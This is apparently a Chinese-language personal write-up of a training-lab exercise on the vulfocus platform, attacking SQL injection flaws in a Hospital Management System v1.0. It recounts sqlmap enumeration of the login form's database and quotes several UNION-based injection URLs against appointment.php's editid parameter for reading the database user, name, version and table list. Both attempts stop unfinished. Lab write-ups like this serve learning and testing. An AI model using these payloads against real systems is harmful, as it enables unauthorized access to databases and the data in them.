前言

暑假闲来无事打打靶机 用的是vulfocus在线平台，我也是第一次用，没想到一次使用只有15min，而且，做的这个没有wp，本次复现不完全，就说一下进行的过程吧

漏洞描述

医院管理系统 (HMS) 是一种基于计算机或网络的系统，有助于管理医院或任何医疗机构的运作。该系统或软件将有助于使整个功能无纸化。它将有关患者、医生、员工、医院管理细节等的所有信息集成到一个软件中。它有组成医院的各种专业人员的部分。

HMS v1.0 被发现包含通过 adminlogin.php、Patientlogin.php 的 SQL 注入漏洞。 admin/123456789

复现过程

思路一

我以为描述中的admin和123456789是最后的结果，需要注入拿到的。

就直接上sqlmap了

在登陆界面 有两个参数

随便输入提交一个并抓包 因为是post请求，需要把数据包导出来，选定loginid参数

可以看到是有四个数据库的

选定hms库查询其中的表

因为时间太慢了，但是一个靶机环境的时间只有15min 这里看到有user表 ，就直接选定user表了

查询user表中的列

到这里就能看到这里有三个字段

读取 这三个字段的值

到这里，发现密码不对啊，不是123456789 到这里这个思路已经中断了

思路二

这个思路参考https://www.cnblogs.com/HOPEAMOR/p/16251404.html

因为是appointment.php文件中的editid参数的漏洞，所以是需要登陆进去的

找到appointment页面

发送payload

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,user()%23#查看当前连接用户

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,database()%23#查看当前连接的数据库

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,version()%23#查看当前数据库版本

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23#查询所有表

最后是基于时间的注入，emm没搞明白这个，没有反应，不知道读哪个表的数据

这个思路也暂时中断了……